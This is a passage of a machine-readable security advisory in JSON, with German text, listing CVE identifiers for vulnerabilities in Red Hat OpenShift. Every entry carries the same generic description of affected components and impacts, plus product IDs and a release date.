Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-47038" }, { "cve": "CVE-2023-48631", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-48631" }, { "cve": "CVE-2023-50387", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-50387" }, { "cve": "CVE-2023-50868", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-50868" }, { "cve": "CVE-2023-51043", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-51043" }, { "cve": "CVE-2023-51779", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-51779" }, { "cve": "CVE-2023-51780", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-51780" }, { "cve": "CVE-2023-52425", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-52425" }, { "cve": "CVE-2023-52434", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-52434" }, { "cve": "CVE-2023-52448", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-52448" }, { "cve": "CVE-2023-52476", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-52476" }, { "cve": "CVE-2023-52489", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-52489" }, { "cve": "CVE-2023-52522", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-52522" }, { "cve": "CVE-2023-52529", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-52529" }, { "cve": "CVE-2023-52574", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-52574" }, { "cve": "CVE-2023-52578", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-52578" }, { "cve": "CVE-2023-52580", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-52580" }, { "cve": "CVE-2023-52581", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-52581" }, { "cve": "CVE-2023-52597", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-52597" }, { "cve": "CVE-2023-52610", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-52610" }, { "cve": "CVE-2023-52620", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-52620" }, { "cve": "CVE-2023-5678", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-5678" }, { "cve": "CVE-2023-6040", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-6040" }, { "cve": "CVE-2023-6121", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-6121" }, { "cve": "CVE-2023-6129", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-6129" }, { "cve": "CVE-2023-6176", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-6176" }, { "cve": "CVE-2023-6228", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-6228" }, { "cve": "CVE-2023-6237", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-6237" }, { "cve": "CVE-2023-6240", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-6240" }, { "cve": "CVE-2023-6531", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-6531" }, { "cve": "CVE-2023-6546", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-6546" }, { "cve": "CVE-2023-6622", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-6622" }, { "cve": "CVE-2023-6915", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-6915" }, { "cve": "CVE-2023-6931", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, dem Linux-Kernel oder dem HTTP/2-Protokoll in der Programmiersprache Go und in der Migration Toolkit Komponente aufgrund mehrerer sicherheitsrelevanter Probleme wie einer Race Condition, einer NULL- Pointer-Dereferenz oder einem Memory Allocation-Problem und mehr. Ein Angreifer kann diese Schwachstellen ausnutzen, um Dateien zu manipulieren, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren, vertrauliche Informationen preiszugeben, seine Privilegien zu erweitern, oder um weitere nicht spezifizierte Angriffe auszuf\u00fchren." } ], "product_status": { "known_affected": [ "67646", "T035034", "T035142", "T035047" ] }, "release_date": "2024-05-22T22:00:00Z", "title": "CVE-2023-6931" }, { "cve": "CVE-2023-6932", "notes": [ { "category": "description", "text": "In Red Hat OpenShift bestehen mehrere Schwachstellen. Diese Schwachstellen bestehen in mehreren Komponenten und Subsystemen wie Oracle Java, 